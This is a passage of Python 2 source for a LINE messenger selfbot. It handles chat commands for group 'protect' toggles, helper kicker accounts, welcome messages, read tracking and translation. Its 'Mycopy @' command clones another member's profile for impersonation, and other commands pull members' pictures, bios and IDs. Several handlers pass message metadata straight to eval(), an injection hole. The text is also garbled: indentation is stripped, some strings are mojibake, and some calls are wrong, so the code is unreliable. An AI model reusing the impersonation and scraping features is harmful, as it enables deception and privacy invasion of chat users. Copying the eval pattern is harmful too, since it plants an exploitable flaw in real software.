G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#======================================================#
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของค���ณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
#======================================================#
#-----------------------------------------------
elif "Mic: " in msg.text:
mmid = msg.text.replace("Mic: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah On")
else:
cl.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already open 👈")
else:
cl.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"sudah off 👈")
else:
cl.sendText(msg.to,"It is already off 👈")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"off already")
else:
cl.sendText(msg.to,"already Close 👈")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'qrprotect on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on ��")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'inviteprotect on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'cancelprotect on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'join on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["Allprotect on","Panick:on"]:
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Already on")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect invite on ")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Already on")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on ")
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Already on")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect on ")
else:
cl.sendText(msg.to,"Already on")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Already on")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR on ")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Allprotect off","Panick:off"]:
if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Already off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect invite off ")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Already off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off ")
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Already off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect off ")
else:
cl.sendText(msg.to,"Already off")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR off ")
else:
cl.sendText(msg.to,"Already off")
elif msg.text.lower() == 'join off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Join Already Off")
else:
cl.sendText(msg.to,"Auto Join set off")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Protect off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"hall ini sudah off ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Qrprotect off","qrprotect off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"hall ini sudah off ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Inviteprotect off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"hall ini sudah off ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Cancelprotect off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"hall ini sudah off ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already open👈")
elif msg.text in ["Leave off","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Share on","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"on👈")
elif msg.text in ["Share off","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"It is already turned off 👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"Off👈")
elif msg.text in ["Welcome:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Welcome:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text.lower() == 'set':
md = ""
if wait["contact"] == True: md+="☞ Contact → ✔\n"
else: md+="🔚 Contact → ❎\n"
if wait["autoJoin"] == True: md+="☞ Auto Join → ✔\n"
else: md+="🔚 Auto Join → ❎\n"
if wait["autoCancel"]["on"] == True:md+="☞ Auto cancel: " + str(wait["autoCancel"]["members"]) + " → ✔\n"
else: md+="🔚 Group cancel → ❎\n"
if wait["leaveRoom"] == True: md+="☞ Auto leave → ✔\n"
else: md+="🔚 Auto leave → ❎\n"
if wait["timeline"] == True: md+="☞ share → ✔\n"
else:md+="🔚 Share → ❎\n"
if wait["autoAdd"] == True: md+="☞ Auto add → ✔\n"
else:md+="🔚 Auto add → ❎\n"
if wait["commentOn"] == True: md+="☞ Auto komentar → ✔\n"
else:md+="🔚 Auto komentar → ❎\n"
if wait["protect"] == True: md+="☞ Protect → ✔\n"
else:md+="🔚 Protect → ❎\n"
if wait["linkprotect"] == True: md+="☞ Link Protect → ✔\n"
else:md+="🔚 Link Protect → ❎\n"
if wait["inviteprotect"] == True: md+="☞ Invitation Protect → ✔\n"
else:md+="🔚 Invitation Protect → ❎\n"
if wait["cancelprotect"] == True: md+="☞ Cancel Protect → ✔\n"
else:md+="🔚 Cancel Protect → ❎\n"
if wait["likeOn"] == True: md+="☞ Auto like → ✔\n"
else:md+="🔚 Auto like → ❎\n" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S')
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
elif msg.text in ["Like:on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["いいね:オフ","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Add on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["Add off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
elif "Message set: " in msg.text:
wait["message"] = msg.text.replace("Message set: ","")
cl.sendText(msg.to,"We changed the message👈")
elif "Help set: " in msg.text:
wait["help"] = msg.text.replace("Help set: ","")
cl.sendText(msg.to,"We changed the Help👈")
elif "Pesan add: " in msg.text:
wait["message"] = msg.text.replace("Pesan add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set: " in msg.text:
c = msg.text.replace("Message set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Comment set: " in msg.text:
c = msg.text.replace("Comment set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di👈")
else:
cl.sendText(msg.to,"To open👈")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"オンã«ã—ã¾ã—ãŸ👈")
else:
cl.sendText(msg.to,"è¦äº†å¼€👈")
elif msg.text in ["Com off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"To turn off")
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"👉Jam on👈")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off🛡")
else:
wait["clock"] = False
cl.sendText(msg.to,"Adalah Off")
elif "Jam say: " in msg.text:
n = msg.text.replace("Jam say: ","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Ini telah diubah🛡\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif msg.text in ["Point","นับ"]:
if msg.toType == 2:
cl.sendText(msg.to, "ตั้งจุดเช็คคนอ่าน:" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S'))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text in ["Read","อ่าน"]:
if msg.toType == 2:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "==============================\nActive readers:%s\n\n\n\nPassive readers:\n%s\n\n==============================\nIn the last seen point:\n[%s]\n==============================\n Powered By: kieselfbotline" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "ReadPoint Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait
cl.sendText(msg.to, "Auto set reading point in:" + datetime.now().strftime('\n📅%Y-%m-%d 🕛 %H:%M:%S'))
else:
cl.sendText(msg.to, "Reading point has not been set.")
#-----------------------[Add Staff Section]------------------------
elif "Add staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list: ")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------------------
elif msg.text in ["Group creator","Gc","Gcreator","gcreator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': gCreator}
cl.sendMessage(msg)
cl.sendText(msg.to,"""╔══════════════
💥ผู้สร้างกลุ่ม Creator 💥Group""")
#-----------------------------------------------------------
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"💗ชื่อ💗 :\n" + contact.displayName + "\n\n💗สเตตัส💗 :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
#----------------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
#=================================================
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#-------------------------------- PP BY TAG ---------------------------------
elif "pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
xname = cl.getContact(msg.from_).displayName
cl.sendText(msg.to,"Kepo Kaka Yaa "+xname+"\n (`・ω・´)\n \n" + datetime.now().strftime('%H:%M:%S'))
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "Pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif msg.text.lower() in ["pap owner","pap creator"]:
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/0hQHBfiuxIDmd_HyI5amNxMENaAAoIMQgvBywTVFNIAgRTLk9kRHBCAlkcAFMGKkBiS3hAUQgbBVFU")
#----------------------------------------------------------------------
elif msg.text in ["Rejectall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Completion。")
ki.sendText(msg.to,"Completion。")
ki2.sendText(msg.to,"Completion。")
ki3.sendText(msg.to,"Completion。")
ki4.sendText(msg.to,"Completion。")
ki5.sendText(msg.to,"💟ทำการลบห้องรันหมดแล้ว💟")
else:
cl.sendText(msg.to,"key is wrong。")
#----------------------------------------------------------------
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฏิเสทคำเชิญเข้ากลุ่มทั้งหมดเรียบร้อย")
else:
cl.sendText(msg.to,"key is wrong")
elif msg.text in ["Reject1","ลบรัน1"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"ปฏิเสทค้างเชิญเรียบร้อย")
else:
ki.sendText(msg.to,"key is wrong")
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
#-----------------------------------------------
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Youtube ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtube ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
#==================================================
# elif msg.text in ["ทีมงาน","ทีมทดลองบอท"]:
# msg.contentType = 13
# cl.sendText(msg.to, "[SELFBOT PHET HACK BOT]\n\n[☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢]\n[By.ทีมงานทีมทดลองบอท]")
# cl.sendText(msg.to, "ผู้จัดการทีมงาน:kielovebot")
# msg.contentMetadata = {'mid': 'uca51afa767df87ba3705494b97c3355c'}
# cl.sendMessage(msg)
#=====================================================
#-----------------------------------------------
#==================================================
#=====================================================
#=================================================================================
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
